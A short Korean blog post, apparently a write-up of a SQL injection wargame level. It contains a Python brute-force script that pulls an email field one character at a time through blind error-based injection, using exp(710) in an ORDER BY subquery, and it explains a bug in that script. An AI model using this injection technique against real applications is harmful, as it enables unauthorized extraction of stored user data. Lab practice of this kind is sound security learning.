티스토리 뷰
스크립트 돌린 결과가 이렇게 나와서 혼란스러웠다. @이 두개..??
뭔가 비슷한듯 다르다.
import requests
password = ""
for i in range(30):
for j in range(48, 122):
URL = 'https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php'
query = {'order': "(select exp(710) where (substr(email, " + str(i+1) + ", 1)='" + chr(j) + "'))"}
headers = {'Content-Type': 'application/json:charset=utf-8'}
cookies = {'PHPSESSID': '5ulm8vjvfa9lcatrj07q0cd1jm'}
res = requests.get(URL, params=query, headers=headers, cookies=cookies)
if "rubiya" not in res.text:
print("[=]Found:" + chr(j))
password = password+chr(j)
break
else:
print(chr(j))
print(query)
print(password)
내 코드는 다음과 같았다. Len이 30인거는 이미 알아낸 후였다.
email이 admin인걸 지정 안해줘서 rubiya의 이메일이랑 겹쳐서 그런거였다...!
코드에 id='admin' 조건을 추가해줬더니 새로운 결과가 잘 나왔다.
'정보보안' 카테고리의 다른 글
| CTF GUIDE (0) | 2021.02.03 |
|---|---|
| [정보보안] FTK Imager 해상도 문제 해결하기 (0) | 2021.02.03 |
| [정보보안] exp()를 사용한 sql injection (0) | 2021.02.02 |
| [정보보안] 디지털 포렌식 2급 (0) | 2021.01.29 |
| [정보보안] 툴 추천 - FTK Imager (0) | 2021.01.29 |